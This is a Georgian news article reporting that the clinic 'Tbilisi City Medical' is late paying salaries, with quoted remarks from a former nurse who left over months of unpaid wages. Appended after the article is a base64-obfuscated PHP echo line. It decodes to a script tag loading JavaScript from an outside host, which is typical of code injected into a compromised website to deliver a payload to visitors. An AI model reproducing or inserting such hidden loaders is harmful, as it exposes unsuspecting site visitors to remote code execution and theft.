celsiusi
ავერსი საქკაბელი
ჯანდაცვის სამინისტროს მიერ თანხის გადარიცხვის დაგვიანების გამო, კლინიკა “თბილისი სითიმედიქალი” თანამშრომლებს ხელფასებს დროულად ვერ ურიცხავს. როგორც საინფორმაციო სააგენტო BUSINESS TIMS-ს კლინიკის ყოფილმა თანამშრომელმა განუცხადა, მისი სამსახურიდან წამოსვლის მიზეზი სწორედ ეს გახდა. 
 
კლინიკის ყოფილი თანამშრომელი, აცხადებს, რომ მისი სამსახურიდან წამოსვლის მიზეზი ხელმძღვანელობის მხრიდან რამე ზეწოლას არ უკავშირდება და მან განცხადება მისი სურვილით დაწერა. 
 
“გუშინ თქვენს მიერ გავრცელებული ინფორმაციის შემდეგ, კომენტარებში ფეისბუქ გვერდზე იწერება , რომ თითქოს მე სამსახურიდან გამომიშვეს, მსგავსი არაფერი ყოფილა, მესამე თვეა ხელფასი არ ამიღია, მარტო მე კი არა სხვებსაც და წამოსვლის მიზეზი სწორედ ეს გახდა, ხელფასების დაგვიანების მიზეზი კი, როგორც გვეუბნებოდნენ ჯანდაცვის სამინისტროდან თანხის გადმორიცხვის პრობლემით იყო გამოწვეული. მინდა გითხრათ, რომ არანაირი პრობლემა ხელმძღვანელობასთან და კოლეგებთან არ მქონია, მე არც ის მითქვამს რომელიმე პაციენტისთვის, რომ რომელიმე საჭირო მედიკამენტი არ გვქონდა კლინიკაში, და რაც შეეხება თქვენს მიერ გუშინ გავრცელებულ ინფორმაციას, ის რომ პაციენტმა მედიკამენტები თავად შეიძინა, თუ რომელიმე ექიმმა მას უთხრა, რომ კლინიკაში მედიკამენტი არ იყო მე ამის შესახებ არ ვიცი, თუმცა როცა მე რაიმე მედიკამენტის საჭიროების შესახებ ხელმძღვანელობას ვეუბნებოდი, უახლოეს 2 საათში პრობლემა აღმოფხვრილი იყო- მედიკამენტები გვქონდა. როგორც გითხარით, ჩემი წამოსვლის მიზეზი არის ხელფასის დაგვიანება, შვილი მყავს გარდაცვლილი , შვილიშვილს ვზრდი და სტაბილური ანაზღაურება მჭირდება” - განაცხადა ალა მატინოვამ. 
 
ჩვენს კითხვაზე არის თუ არა ცხელი წყალი კლინიკაში კლინიკიდან წამოსული მედდა ადასტურებს, რომ არ არის . 
 
შეგახსენებთ, რომ გუშინ საინფორმაციო სააგენტო BUSINESS TIMS-ს კლილიკიდან პაციენტი დაუკავშირდა და არსებული პრობლემების შესახებ მოუყვა. 
 
ცნობისთვის, BUSINESS TIME-ი დაუკავშირდა გუშინ კლინიკა “თბილისი სითიმედიქალის” ხელმძღვანელს დეტალების დასაზუსტებლად, თუმცა კომუნიკაცია ვერ შედგა ტექნიკური ხარვეზის გამო და ჩვენი მომდევნო ზარი და სმს-შეტყობინება კლინიკის ხელმძღვანელმა უპასუხოდ დატოვა.  
 
 
 
1370
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");